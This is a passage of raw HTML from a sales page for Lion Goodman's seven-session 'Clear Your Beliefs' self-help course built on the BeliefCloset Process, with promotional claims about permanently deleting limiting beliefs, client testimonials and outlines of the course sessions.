built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n\r\n&nbsp;\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset 